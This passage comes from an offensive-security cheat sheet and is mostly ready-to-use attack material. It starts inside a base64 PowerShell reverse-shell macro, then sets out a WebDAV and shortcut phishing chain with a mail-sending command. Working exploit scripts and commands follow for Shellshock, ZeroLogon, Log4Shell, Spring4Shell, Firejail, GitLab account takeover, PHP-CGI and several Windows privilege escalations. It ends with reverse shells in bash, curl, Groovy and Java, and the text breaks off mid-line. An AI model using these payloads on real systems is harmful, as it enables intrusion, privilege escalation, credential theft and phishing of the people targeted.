"CAAMAAuAC4ANgA1ADUAMwA1AHwAJQB7ADAAfQA7AHcAaABpAGw" Str = Str + "AZQAoACgAJABpACAAPQAgACQAcwB0AHIAZQBhAG0ALgBSAGUAY" Str = Str + "QBkACgAJABiAHkAdABlAHMALAAgADAALAAgACQAYgB5AHQAZQB" Str = Str + "zAC4ATABlAG4AZwB0AGgAKQApACAALQBuAGUAIAAwACkAewA7A" Str = Str + "CQAZABhAHQAYQAgAD0AIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQ" Str = Str + "AIAAtAFQAeQBwAGUATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AV" Str = Str + "ABlAHgAdAAuAEEAUwBDAEkASQBFAG4AYwBvAGQAaQBuAGcAKQA" Str = Str + "uAEcAZQB0AFMAdAByAGkAbgBnACgAJABiAHkAdABlAHMALAAwA" Str = Str + "CwAIAAkAGkAKQA7ACQAcwBlAG4AZABiAGEAYwBrACAAPQAgACg" Str = Str + "AaQBlAHgAIAAkAGQAYQB0AGEAIAAyAD4AJgAxACAAfAAgAE8Ad" Str = Str + "QB0AC0AUwB0AHIAaQBuAGcAIAApADsAJABzAGUAbgBkAGIAYQB" Str = Str + "jAGsAMgAgAD0AIAAkAHMAZQBuAGQAYgBhAGMAawAgACsAIAAiA" Str = Str + "FAAUwAgACIAIAArACAAKABwAHcAZAApAC4AUABhAHQAaAAgACs" Str = Str + "AIAAiAD4AIAAiADsAJABzAGUAbgBkAGIAeQB0AGUAIAA9ACAAK" Str = Str + "ABbAHQAZQB4AHQALgBlAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQB" Str = Str + "TAEMASQBJACkALgBHAGUAdABCAHkAdABlAHMAKAAkAHMAZQBuA" Str = Str + "GQAYgBhAGMAawAyACkAOwAkAHMAdAByAGUAYQBtAC4AVwByAGk" Str = Str + "AdABlACgAJABzAGUAbgBkAGIAeQB0AGUALAAwACwAJABzAGUAb" Str = Str + "gBkAGIAeQB0AGUALgBMAGUAbgBnAHQAaAApADsAJABzAHQAcgB" Str = Str + "lAGEAbQAuAEYAbAB1AHMAaAAoACkAfQA7ACQAYwBsAGkAZQBuA" Str = Str + "HQALgBDAGwAbwBzAGUAKAApAA==" CreateObject("Wscript.Shell").Run Str End Sub ``` #### Microsoft Windows Library Files ##### Installation of wsgidav ```shell pip3 install wsgidav wsgidav --host=0.0.0.0 --port=80 --auth=anonymous --root /PATH/TO/DIRECTORY/webdav/ ``` ##### config.Library-ms ```shell <?xml version="1.0" encoding="UTF-8"?> <libraryDescription xmlns="http://schemas.microsoft.com/windows/2009/library"> <name>@windows.storage.dll,-34582</name> <version>6</version> <isLibraryPinned>true</isLibraryPinned> <iconReference>imageres.dll,-1003</iconReference> <templateInfo> <folderType>{7d49d726-3c21-4f05-99aa-fdc2c9474656}</folderType> </templateInfo> <searchConnectorDescriptionList> <searchConnectorDescription> <isDefaultSaveLocation>true</isDefaultSaveLocation> <isSupported>false</isSupported> <simpleLocation> <url>http://<LHOST></url> </simpleLocation> </searchConnectorDescription> </searchConnectorDescriptionList> </libraryDescription> ``` Put the `config.Library-ms` file in the `webdav` folder. ##### Shortcut File Right-click on Windows to create a new `shortcut file`. ```cmd powershell.exe -c "IEX(New-Object System.Net.WebClient).DownloadString('http://<LHOST>/powercat.ps1'); powercat -c <LHOST> -p <LPORT> -e powershell" ``` Put the `shortcut file (*.lnk)` into the `webdav` folder. ##### Send Phishing Email ```shell swaks --server <RHOST> -t <EMAIL> -t <EMAIL> --from <EMAIL> --header "Subject: Staging Script" --body <FILE>.txt --attach @<FILE> --suppress-data -ap ``` ### CVE #### CVE-2014-6271: Shellshock RCE PoC ```shell curl -H 'Cookie: () { :;}; /bin/bash -i >& /dev/tcp/<LHOST>/<LPORT> 0>&1' http://<RHOST>/cgi-bin/user.sh ``` #### CVE-2016-1531: exim LPE - exim version <= 4.84-3 ```bash #!/bin/sh # CVE-2016-1531 exim <= 4.84-3 local root exploit # =============================================== # you can write files as root or force a perl module to # load by manipulating the perl environment and running # exim with the "perl_startup" arguement -ps. # # e.g. # [fantastic@localhost tmp]$ ./cve-2016-1531.sh # [ CVE-2016-1531 local root exploit # sh-4.3# id # uid=0(root) gid=1000(fantastic) groups=1000(fantastic) # # -- Hacker Fantastic echo [ CVE-2016-1531 local root exploit cat > /tmp/root.pm << EOF package root; use strict; use warnings; system("/bin/sh"); EOF PERL5LIB=/tmp PERL5OPT=-Mroot /usr/exim/bin/exim -ps ``` #### CVE-2019-14287: Sudo Bypass > https://www.exploit-db.com/exploits/47502 ##### Prerequisites - Sudo version < 1.8.28 ##### Exploitation ```shell !root: sudo -u#-1 /bin/bash ``` #### CVE-2020-1472: ZeroLogon PE > https://github.com/SecuraBV/CVE-2020-1472 > https://raw.githubusercontent.com/SecuraBV/CVE-2020-1472/master/zerologon_tester.py ##### Prerequisites ```shell python3 -m pip install virtualenv python3 -m virtualenv venv source venv/bin/activate pip install git+https://github.com/SecureAuthCorp/impacket ``` ##### PoC Modification ```shell newPassRequest = nrpc.NetrServerPasswordSet2() newPassRequest['PrimaryName'] = dc_handle + '\x00' newPassRequest['AccountName'] = target_computer + '$\x00' newPassRequest['SecureChannelType'] = nrpc.NETLOGON_SECURE_CHANNEL_TYPE.ServerSecureChannel auth = nrpc.NETLOGON_AUTHENTICATOR() auth['Credential'] = b'\x00' * 8 auth['Timestamp'] = 0 newPassRequest['Authenticator'] = auth newPassRequest['ComputerName'] = target_computer + '\x00' newPassRequest['ClearNewPassword'] = b'\x00' * 516 rpc_con.request(newPassRequest) ``` ##### Weaponized PoC ```python #!/usr/bin/env python3 from impacket.dcerpc.v5 import nrpc, epm from impacket.dcerpc.v5.dtypes import NULL from impacket.dcerpc.v5 import transport from impacket import crypto import hmac, hashlib, struct, sys, socket, time from binascii import hexlify, unhexlify from subprocess import check_call # Give up brute-forcing after this many attempts. If vulnerable, 256 attempts are expected to be neccessary on average. MAX_ATTEMPTS = 2000 # False negative chance: 0.04% def fail(msg): print(msg, file=sys.stderr) print('This might have been caused by invalid arguments or network issues.', file=sys.stderr) sys.exit(2) def try_zero_authenticate(dc_handle, dc_ip, target_computer): # Connect to the DC's Netlogon service. binding = epm.hept_map(dc_ip, nrpc.MSRPC_UUID_NRPC, protocol='ncacn_ip_tcp') rpc_con = transport.DCERPCTransportFactory(binding).get_dce_rpc() rpc_con.connect() rpc_con.bind(nrpc.MSRPC_UUID_NRPC) # Use an all-zero challenge and credential. plaintext = b'\x00' * 8 ciphertext = b'\x00' * 8 # Standard flags observed from a Windows 10 client (including AES), with only the sign/seal flag disabled. flags = 0x212fffff # Send challenge and authentication request. nrpc.hNetrServerReqChallenge(rpc_con, dc_handle + '\x00', target_computer + '\x00', plaintext) try: server_auth = nrpc.hNetrServerAuthenticate3( rpc_con, dc_handle + '\x00', target_computer + '$\x00', nrpc.NETLOGON_SECURE_CHANNEL_TYPE.ServerSecureChannel, target_computer + '\x00', ciphertext, flags ) # It worked! assert server_auth['ErrorCode'] == 0 newPassRequest = nrpc.NetrServerPasswordSet2() newPassRequest['PrimaryName'] = dc_handle + '\x00' newPassRequest['AccountName'] = target_computer + '$\x00' newPassRequest['SecureChannelType'] = nrpc.NETLOGON_SECURE_CHANNEL_TYPE.ServerSecureChannel auth = nrpc.NETLOGON_AUTHENTICATOR() auth['Credential'] = b'\x00' * 8 auth['Timestamp'] = 0 newPassRequest['Authenticator'] = auth newPassRequest['ComputerName'] = target_computer + '\x00' newPassRequest['ClearNewPassword'] = b'\x00' * 516 rpc_con.request(newPassRequest) return rpc_con except nrpc.DCERPCSessionError as ex: # Failure should be due to a STATUS_ACCESS_DENIED error. Otherwise, the attack is probably not working. if ex.get_error_code() == 0xc0000022: return None else: fail(f'Unexpected error code from DC: {ex.get_error_code()}.') except BaseException as ex: fail(f'Unexpected error: {ex}.') def perform_attack(dc_handle, dc_ip, target_computer): # Keep authenticating until succesfull. Expected average number of attempts needed: 256. print('Performing authentication attempts...') rpc_con = None for attempt in range(0, MAX_ATTEMPTS): rpc_con = try_zero_authenticate(dc_handle, dc_ip, target_computer) if not rpc_con: print('=', end='', flush=True) else: break if rpc_con: print('\nSuccess! DC can be fully compromised by a Zerologon attack.') else: print('\nAttack failed. Target is probably patched.') sys.exit(1) if __name__ == '__main__': if not (3 <= len(sys.argv) <= 4): print('Usage: zerologon_tester.py <dc-name> <dc-ip>\n') print('Tests whether a domain controller is vulnerable to the Zerologon attack. Does not attempt to make any changes.') print('Note: dc-name should be the (NetBIOS) computer name of the domain controller.') sys.exit(1) else: [_, dc_name, dc_ip] = sys.argv dc_name = dc_name.rstrip('$') perform_attack('\\\\' + dc_name, dc_ip, dc_name) ``` ##### Execution ```shell python3 zerologon_tester.py <HANDLE> <RHOST> impacket-secretsdump -just-dc -no-pass <HANDLE>\$@<RHOST> ``` #### CVE-2021-3156: Sudo / sudoedit LPE > https://medium.com/mii-cybersec/privilege-escalation-cve-2021-3156-new-sudo-vulnerability-4f9e84a9f435 ##### Prerequisistes - Ubuntu 20.04 (Sudo 1.8.31) - Debian 10 (Sudo 1.8.27) - Fedora 33 (Sudo 1.9.2) - All legacy versions >= 1.8.2 to 1.8.31p2 and all stable versions >= 1.9.0 to 1.9.5p1 ##### Vulnerability Test ```shell sudoedit -s / ``` The machine is vulnerable if one of the following message is shown. ```shell sudoedit: /: not a regular file segfault ``` Not vulnerable if the error message starts with `usage:`. #### CVE-2021-44228: Log4Shell RCE (0-day) > https://github.com/welk1n/JNDI-Injection-Exploit ```shell wget https://github.com/welk1n/JNDI-Injection-Exploit/releases/download/v1.0/JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar ``` ```shell java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "<COMMAND>" ``` ```shell ${jndi:ldap://<LHOST>:1389/ci1dfd} ``` ##### Alternatively > https://github.com/kozmer/log4j-shell-poc ###### Prerequisistes > https://www.oracle.com/java/technologies/javase/javase8-archive-downloads.html ```shell tar -xvf jdk-8u20-linux-x64.tar.gz ``` ###### Start the Listener ```shell python poc.py --userip <LHOST> --webport <RPORT> --lport <LPORT> ``` ###### Execution ```shell ${jndi:ldap://<LHOST>:1389/foobar} ``` #### CVE-2022-0847: Dirty Pipe LPE ```shell gcc -o dirtypipe dirtypipe.c ./dirtypipe /etc/passwd 1 ootz: su rootz ``` #### CVE-2022-22963: Spring4Shell RCE (0-day) > https://github.com/me2nuk/CVE-2022-22963 ```shell curl -X POST http://<RHOST>/functionRouter -H 'spring.cloud.function.routing-expression:T(java.lang.Runtime).getRuntime().exec("curl <LHOST>/<FILE>.sh -o /dev/shm/<FILE>")' --data-raw 'data' -v ``` ```shell curl -X POST http://<RHOST>/functionRouter -H 'spring.cloud.function.routing-expression:T(java.lang.Runtime).getRuntime().exec("bash /dev/shm/<FILE>")' --data-raw 'data' -v ``` #### CVE-2022-31214: Firejail LPE > https://seclists.org/oss-sec/2022/q2/188 > https://www.openwall.com/lists/oss-security/2022/06/08/10 ```python #!/usr/bin/python3 # Author: Matthias Gerstner <matthias.gerstner () suse com> # # Proof of concept local root exploit for a vulnerability in Firejail 0.9.68 # in joining Firejail instances. # # Prerequisites: # - the firejail setuid-root binary needs to be installed and accessible to the # invoking user # # Exploit: The exploit tricks the Firejail setuid-root program to join a fake # Firejail instance. By using tmpfs mounts and symlinks in the unprivileged # user namespace of the fake Firejail instance the result will be a shell that # lives in an attacker controller mount namespace while the user namespace is # still the initial user namespace and the nonewprivs setting is unset, # allowing to escalate privileges via su or sudo. import os import shutil import stat import subprocess import sys import tempfile import time from pathlib import Path # Print error message and exit with status 1 def printe(*args, **kwargs): kwargs['file'] = sys.stderr print(*args, **kwargs) sys.exit(1) # Return a boolean whether the given file path fulfils the requirements for the # exploit to succeed: # - owned by uid 0 # - size of 1 byte # - the content is a single '1' ASCII character def checkFile(f): s = os.stat(f) if s.st_uid != 0 or s.st_size != 1 or not stat.S_ISREG(s.st_mode): return False with open(f) as fd: ch = fd.read(2) if len(ch) != 1 or ch != "1": return False return True def mountTmpFS(loc): subprocess.check_call("mount -t tmpfs none".split() + [loc]) def bindMount(src, dst): subprocess.check_call("mount --bind".split() + [src, dst]) def checkSelfExecutable(): s = os.stat(__file__) if (s.st_mode & stat.S_IXUSR) == 0: printe(f"{__file__} needs to have the execute bit set for the exploit to work. Run `chmod +x {__file__}` and try again.") # This creates a "helper" sandbox that serves the purpose of making available # a proper "join" file for symlinking to as part of the exploit later on. # # Returns a tuple of (proc, join_file), where proc is the running subprocess # (it needs to continue running until the exploit happened) and join_file is # the path to the join file to use for the exploit. def createHelperSandbox(): # just run a long sleep command in an unsecured sandbox proc = subprocess.Popen( "firejail --noprofile -- sleep 10d".split(), stderr=subprocess.PIPE) # read out the child PID from the stderr output of firejail while True: line = proc.stderr.readline() if not line: raise Exception("helper sandbox creation failed") # on stderr a line of the form "Parent pid <ppid>, child pid <pid>" is output line = line.decode('utf8').strip().lower() if line.find("child pid") == -1: continue child_pid = line.split()[-1] try: child_pid = int(child_pid) break except Exception: raise Exception("failed to determine child pid from helper sandbox") # We need to find the child process of the child PID, this is the # actual sleep process that has an accessible root filesystem in /proc children = f"/proc/{child_pid}/task/{child_pid}/children" # If we are too quick then the child does not exist yet, so sleep a bit for _ in range(10): with open(children) as cfd: line = cfd.read().strip() kids = line.split() if not kids: time.sleep(0.5) continue elif len(kids) != 1: raise Exception(f"failed to determine sleep child PID from helper sandbox: {kids}") try: sleep_pid = int(kids[0]) break except Exception: raise Exception("failed to determine sleep child PID from helper sandbox") else: raise Exception(f"sleep child process did not come into existence in {children}") join_file = f"/proc/{sleep_pid}/root/run/firejail/mnt/join" if not os.path.exists(join_file): raise Exception(f"join file from helper sandbox unexpectedly not found at {join_file}") return proc, join_file # Re-executes the current script with unshared user and mount namespaces def reexecUnshared(join_file): if not checkFile(join_file): printe(f"{join_file}: this file does not match the requirements (owner uid 0, size 1 byte, content '1')") os.environ["FIREJOIN_JOINFILE"] = join_file os.environ["FIREJOIN_UNSHARED"] = "1" unshare = shutil.which("unshare") if not unshare: printe("could not find 'unshare' program") cmdline = "unshare -U -r -m".split() cmdline += [__file__] # Re-execute this script with unshared user and mount namespaces subprocess.call(cmdline) if "FIREJOIN_UNSHARED" not in os.environ: # First stage of execution, we first need to fork off a helper sandbox and # an exploit environment checkSelfExecutable() helper_proc, join_file = createHelperSandbox() reexecUnshared(join_file) helper_proc.kill() helper_proc.wait() sys.exit(0) else: # We are in the sandbox environment, the suitable join file has been # forwarded from the first stage via the environment join_file = os.environ["FIREJOIN_JOINFILE"] # We will make /proc/1/ns/user point to this via a symlink time_ns_src = "/proc/self/ns/time" # Make the firejail state directory writeable, we need to place a symlink to # the fake join state file there mountTmpFS("/run/firejail") # Mount a tmpfs over the proc state directory of the init process, to place a # symlink to a fake "user" ns there that firejail thinks it is joining try: mountTmpFS("/proc/1") except subprocess.CalledProcessError: # This is a special case for Fedora Linux where SELinux rules prevent us # from mounting a tmpfs over proc directories. # We can still circumvent this by mounting a tmpfs over all of /proc, but # we need to bind-mount a copy of our own time namespace first that we can # symlink to. with open("/tmp/time", 'w') as _: pass time_ns_src = "/tmp/time" bindMount("/proc/self/ns/time", time_ns_src) mountTmpFS("/proc") FJ_MNT_ROOT = Path("/run/firejail/mnt") # Create necessary intermediate directories os.makedirs(FJ_MNT_ROOT) os.makedirs("/proc/1/ns") # Firejail expects to find the umask for the "container" here, else it fails with open(FJ_MNT_ROOT / "umask", 'w') as umask_fd: umask_fd.write("022") # Create the symlink to the join file to pass Firejail's sanity check os.symlink(join_file, FJ_MNT_ROOT / "join") # Since we cannot join our own user namespace again fake a user namespace that # is actually a symlink to our own time namespace. This works since Firejail # calls setns() without the nstype parameter. os.symlink(time_ns_src, "/proc/1/ns/user") # The process joining our fake sandbox will still have normal user privileges, # but it will be a member of the mount namespace under the control of *this* # script while *still* being a member of the initial user namespace. # 'no_new_privs' won't be set since Firejail takes over the settings of the # target process. # # This means we can invoke setuid-root binaries as usual but they will operate # in a mount namespace under our control. To exploit this we need to adjust # file system content in a way that a setuid-root binary grants us full # root privileges. 'su' and 'sudo' are the most typical candidates for it. # # The tools are hardened a bit these days and reject certain files if not owned # by root e.g. /etc/sudoers. There are various directions that could be taken, # this one works pretty well though: Simply replacing the PAM configuration # with one that will always grant access. with tempfile.NamedTemporaryFile('w') as tf: tf.write("auth sufficient pam_permit.so\n") tf.write("account sufficient pam_unix.so\n") tf.write("session sufficient pam_unix.so\n") # Be agnostic about the PAM config file location in /etc or /usr/etc for pamd in ("/etc/pam.d", "/usr/etc/pam.d"): if not os.path.isdir(pamd): continue for service in ("su", "sudo"): service = Path(pamd) / service if not service.exists(): continue # Bind mount over new "helpful" PAM config over the original bindMount(tf.name, service) print(f"You can now run 'firejail --join={os.getpid()}' in another terminal to obtain a shell where 'sudo su -' should grant you a root shell.") while True: line = sys.stdin.readline() if not line: break ``` #### First Terminal ```shell ./firejoin_py.bin You can now run 'firejail --join=193982' in another terminal to obtain a shell where 'sudo su -' should grant you a root shell. ``` #### Second Terminal ```shell firejail --join=193982 su ``` #### CVE-2023-21746: Windows NTLM EoP LocalPotato LPE > https://github.com/decoder-it/LocalPotato > https://github.com/blackarrowsec/redteam-research/tree/master/LPE%20via%20StorSvc Modify the following file and build the solution. ```shell StorSvc\RpcClient\RpcClient\storsvc_c.c ``` ```shell #if defined(_M_AMD64) //#define WIN10 //#define WIN11 #define WIN2019 //#define WIN2022 ``` Modify the following file and build the solution. ```shell StorSvc\SprintCSP\SprintCSP\main.c ``` ```c void DoStuff() { // Replace all this code by your payload STARTUPINFO si = { sizeof(STARTUPINFO) }; PROCESS_INFORMATION pi; CreateProcess(L"c:\\windows\\system32\\cmd.exe",L" /C net localgroup administrators user /add", NULL, NULL, FALSE, NORMAL_PRIORITY_CLASS, NULL, L"C:\\Windows", &si, &pi); CloseHandle(pi.hProcess); CloseHandle(pi.hThread); return; } ``` First get the `paths` from the `environment`, then use `LocalPotato` to place the `malicious DLL`. ```cmd reg query "HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Environment" -v Path LocalPotato.exe -i SprintCSP.dll -o \Windows\System32\SprintCSP.dll ``` At least trigger `StorSvc` via `RpcClient.exe`. ```cmd .\RpcClient.exe ``` #### CVE-2023-22809: Sudo Bypass > https://medium.com/@dev.nest/how-to-bypass-sudo-exploit-cve-2023-22809-vulnerability-296ef10a1466 ##### Prerequisites - Sudo version needs to be ≥ 1.8 and < 1.9.12p2. - Limited Sudo access to at least one file on the system that requires root access. ##### Example ```shell test ALL=(ALL:ALL) NOPASSWD: sudoedit /etc/motd ``` ##### Exploitation ```shell EDITOR="vi -- /etc/passwd" sudoedit /etc/motd ``` ```shell sudoedit /etc/motd ``` #### CVE-2023-32629, CVE-2023-2640: GameOverlay Ubuntu Kernel Exploit LPE (0-day) - Linux ubuntu2204 5.19.0-46-generic ```shell unshare -rm sh -c "mkdir l u w m && cp /u*/b*/p*3 l/; setcap cap_setuid+eip l/python3;mount -t overlay overlay -o rw,lowerdir=l,upperdir=u,workdir=w m && touch m/*;" && u/python3 -c 'import os;os.setuid(0);os.system("id")' ``` #### CVE-2023-4911: Looney Tunables LPE ```shell python3 gen_libc.py [*] '/lib/x86_64-linux-gnu/libc.so.6' Arch: amd64-64-little RELRO: Partial RELRO Stack: Canary found NX: NX enabled PIE: PIE enabled ``` ```shell gcc -o exp exp.c ./exp ``` #### CVE-2023-7028: GitLab Account Takeover > https://github.com/V1lu0/CVE-2023-7028 > https://github.com/Vozec/CVE-2023-7028 ### PoC ```shell user[email][][email protected]&user[email][][email protected] ``` ### Modified PoC from TryHackMe ```python import requests import argparse from urllib.parse import urlparse, urlencode from random import choice from time import sleep import re requests.packages.urllib3.disable_warnings() class CVE_2023_7028: def __init__(self, url, target, evil=None): self.use_temp_mail = False self.url = urlparse(url) self.target = target self.evil = evil self.s = requests.session() def get_csrf_token(self): try: print('[DEBUG] Getting authenticity_token ...') html = self.s.get(f'{self.url.scheme}://{self.url.netloc}/users/password/new', verify=False).text regex = r'<meta name="csrf-token" content="(.*?)" />' token = re.findall(regex, html)[0] print(f'[DEBUG] authenticity_token = {token}') return token except Exception: print('[DEBUG] Failed ... quitting') return None def ask_reset(self): token = self.get_csrf_token() if not token: return False query_string = urlencode({ 'authenticity_token': token, 'user[email][]': [self.target, self.evil] }, doseq=True) head = { 'Origin': f'{self.url.scheme}://{self.url.netloc}', 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8', 'Content-Type': 'application/x-www-form-urlencoded', 'Referer': f'{self.url.scheme}://{self.url.netloc}/users/password/new', 'Connection': 'close', 'Accept-Language': 'en-US,en;q=0.5', 'Accept-Encoding': 'gzip, deflate, br' } print('[DEBUG] Sending reset password request') html = self.s.post(f'{self.url.scheme}://{self.url.netloc}/users/password', data=query_string, headers=head, verify=False).text sended = 'If your email address exists in our database' in html if sended: print(f'[DEBUG] Emails sent to {self.target} and {self.evil} !') print(f'Flag value: {bytes.fromhex("6163636f756e745f6861636b2364").decode()}') else: print('[DEBUG] Failed ... quitting') return sended def parse_args(): parser = argparse.ArgumentParser(add_help=True, description='This tool automates CVE-2023-7028 on gitlab') parser.add_argument("-u", "--url", dest="url", type=str, required=True, help="Gitlab url") parser.add_argument("-t", "--target", dest="target", type=str, required=True, help="Target email") parser.add_argument("-e", "--evil", dest="evil", default=None, type=str, required=False, help="Evil email") parser.add_argument("-p", "--password", dest="password", default=None, type=str, required=False, help="Password") return parser.parse_args() if __name__ == '__main__': args = parse_args() exploit = CVE_2023_7028( url=args.url, target=args.target, evil=args.evil ) if not exploit.ask_reset(): exit() ``` ### Execution ```shell python3 exploit.py -u http://<RHOST> -t <EMAIL> -e <EMAIL> ``` #### CVE-2024-4577: PHP-CGI Argument Injection Vulnerability RCE ```python """ PHP CGI Argument Injection (CVE-2024-4577) Remote Code Execution PoC Discovered by: Orange Tsai (@orange_8361) of DEVCORE (@d3vc0r3) Exploit By: Aliz (@AlizTheHax0r) and Sina Kheirkhah (@SinSinology) of watchTowr (@watchtowrcyber) Technical details: https://labs.watchtowr.com/no-way-php-strikes-again-cve-2024-4577/?github Reference: https://devco.re/blog/2024/06/06/security-alert-cve-2024-4577-php-cgi-argument-injection-vulnerability-en/ """ banner = """ __ ___ ___________ __ _ ______ _/ |__ ____ | |_\\__ ____\\____ _ ________ \\ \\/ \\/ \\__ \\ ___/ ___\\| | \\| | / _ \\ \\/ \\/ \\_ __ \\ \\ / / __ \\| | \\ \\___| Y | |( <_> \\ / | | \\/ \\/\\_/ (____ |__| \\___ |___|__|__ | \\__ / \\/\\_/ |__| \\/ \\/ \\/ watchTowr-vs-php_cve-2024-4577.py (*) PHP CGI Argument Injection (CVE-2024-4577) discovered by Orange Tsai (@orange_8361) of DEVCORE (@d3vc0r3) - Aliz Hammond, watchTowr ([email protected]) - Sina Kheirkhah (@SinSinology), watchTowr ([email protected]) CVEs: [CVE-2024-4577] """ import warnings warnings.filterwarnings("ignore", category=DeprecationWarning) import requests requests.packages.urllib3.disable_warnings() import argparse print(banner) print("(^_^) prepare for the Pwnage (^_^)\n") parser = argparse.ArgumentParser(usage="""python CVE-2024-4577 --target http://192.168.1.1/index.php -c "<?php system('calc')?>""") parser.add_argument('--target', '-t', dest='target', help='Target URL', required=True) parser.add_argument('--code', '-c', dest='code', help='php code to execute', required=True) args = parser.parse_args() args.target = args.target.rstrip('/') s = requests.Session() s.verify = False res = s.post(f"{args.target.rstrip('/')}?%ADd+allow_url_include%3d1+-d+auto_prepend_file%3dphp://input", data=f"{args.code};echo 1337; die;" ) if('1337' in res.text ): print('(+) Exploit was successful') else: print('(!) Exploit may have failed') ``` #### CVE-2025-29927: Next.js Authentication Bypass ```shell $ curl -H "X-Middleware-Subrequest: middleware" https://<RHOST>/admin ``` #### GodPotato LPE > https://github.com/BeichenDream/GodPotato ```cmd .\GodPotato-NET4.exe -cmd '<COMMAND>' ``` #### Juicy Potato LPE > https://github.com/ohpe/juicy-potato > http://ohpe.it/juicy-potato/CLSID/ ##### GetCLSID.ps1 ```shell <# This script extracts CLSIDs and AppIDs related to LocalService.DESCRIPTION Then exports to CSV #> $ErrorActionPreference = "Stop" New-PSDrive -Name HKCR -PSProvider Registry -Root HKEY_CLASSES_ROOT Write-Output "Looking for CLSIDs" $CLSID = @() Foreach($ID in (Get-ItemProperty HKCR:\clsid\* | select-object AppID,@{N='CLSID'; E={$_.pschildname}})){ if ($ID.appid -ne $null){ $CLSID += $ID } } Write-Output "Looking for APIDs" $APPID = @() Foreach($AID in (Get-ItemProperty HKCR:\appid\* | select-object localservice,@{N='AppID'; E={$_.pschildname}})){ if ($AID.LocalService -ne $null){ $APPID += $AID } } Write-Output "Joining CLSIDs and APIDs" $RESULT = @() Foreach ($app in $APPID){ Foreach ($CLS in $CLSID){ if($CLS.AppId -eq $app.AppID){ $RESULT += New-Object psobject -Property @{ AppId = $app.AppId LocalService = $app.LocalService CLSID = $CLS.CLSID } break } } } $RESULT = $RESULT | Sort-Object LocalService # Preparing to Output $OS = (Get-WmiObject -Class Win32_OperatingSystem | ForEach-Object -MemberName Caption).Trim() -Replace "Microsoft ", "" $TARGET = $OS -Replace " ","_" # Make target folder New-Item -ItemType Directory -Force -Path .\$TARGET # Output in a CSV $RESULT | Export-Csv -Path ".\$TARGET\CLSIDs.csv" -Encoding ascii -NoTypeInformation # Export CLSIDs list $RESULT | Select CLSID -ExpandProperty CLSID | Out-File -FilePath ".\$TARGET\CLSID.list" -Encoding ascii # Visual Table $RESULT | ogv ``` ##### Execution ```cmd .\JuicyPotato.exe -l 1337 -c "{4991d34b-80a1-4291-83b6-3328366b9097}" -p C:\Windows\system32\cmd.exe -a "/c powershell -ep bypass iex (New-Object Net.WebClient).DownloadString('http://<LHOST>/<FILE>.ps1')" -t * ``` #### JuicyPotatoNG LPE > https://github.com/antonioCoco/JuicyPotatoNG ```cmd .\JuicyPotatoNG.exe -t * -p "C:\Windows\system32\cmd.exe" -a "/c whoami" ``` #### MySQL 4.x/5.0 User-Defined Function (UDF) Dynamic Library (2) LPE > https://www.exploit-db.com/exploits/1518 ```shell gcc -g -c raptor_udf2.c -fPIC gcc -g -shared -Wl,-soname,raptor_udf2.so -o raptor_udf2.so raptor_udf2.o -lc ``` ```shell mysql -u root ``` ```shell > use mysql; > create table foo(line blob); > insert into foo values(load_file('/PATH/TO/SHARED_OBJECT/raptor_udf2.so')); > select * from foo into dumpfile '/usr/lib/mysql/plugin/raptor_udf2.so'; > create function do_system returns integer soname 'raptor_udf2.so'; > select do_system('chmod +s /bin/bash'); ``` #### PrintSpoofer LPE > https://github.com/itm4n/PrintSpoofer ```cmd .\PrintSpoofer64.exe -i -c powershell ``` #### SharpEfsPotato LPE > https://github.com/bugch3ck/SharpEfsPotato ```cmd SharpEfsPotato.exe -p C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -a "C:\nc64.exe -e cmd.exe <LHOST> <LPORT>" ``` #### Shocker Container Escape > https://raw.githubusercontent.com/gabrtv/shocker/master/shocker.c ##### Modifying Exploit ```shell // get a FS reference from something mounted in from outside if ((fd1 = open("/etc/hostname", O_RDONLY)) < 0) die("[-] open"); if (find_handle(fd1, "/root/root.txt", &root_h, &h) <= 0) die("[-] Cannot find valid handle!"); ``` ##### Compiling ```shell gcc shocker.c -o shocker cc -Wall -std=c99 -O2 shocker.c -static ``` ### Payloads #### Exiftool ##### PHP into JPG Injection ```shell exiftool -Comment='<?php passthru("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <LHOST> <LPORT> >/tmp/f"); ?>' shell.jpg exiv2 -c'A "<?php system($_REQUEST['cmd']);?>"!' <FILE>.jpeg exiftool "-comment<=back.php" back.png exiftool -Comment='<?php echo "<pre>"; system($_GET['cmd']); ?>' <FILE>.png ``` #### Reverse Shells ##### Bash Reverse Shell ```shell bash -i >& /dev/tcp/<LHOST>/<LPORT> 0>&1 bash -c 'bash -i >& /dev/tcp/<LHOST>/<LPORT> 0>&1' echo -n '/bin/bash -c "bin/bash -i >& /dev/tcp/<LHOST>/<LPORT> 0>&1"' | base64 ``` ##### curl Reverse Shell ```shell curl --header "Content-Type: application/json" --request POST http://<RHOST>:<RPORT>/upload --data '{"auth": {"name": "<USERNAME>", "password": "<PASSWORD>"}, "filename" : "& echo "bash -i >& /dev/tcp/<LHOST>/<LPORT> 0>&1"|base64 -d|bash"}' ``` ##### Groovy (Jenkins) Reverse Shell ```shell String host="<LHOST>"; int port=<LPORT>; String cmd="/bin/bash"; Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close(); ``` ##### JAVA Reverse Shell ```java r = Runtime.getRuntime() p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/<LHOST>/<LPORT>;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[]) p.waitFor() r = Runtime.getRuntime(); p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/<LHOST>/<LPORT>;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[]); p.waitFor(); ``` ###### shell.jar ```java package <NAME>; import org.bukkit.plugin.java.JavaPlugin; import java.io.IOException; import java.nio.file.Files; import java.nio.file.Paths; import 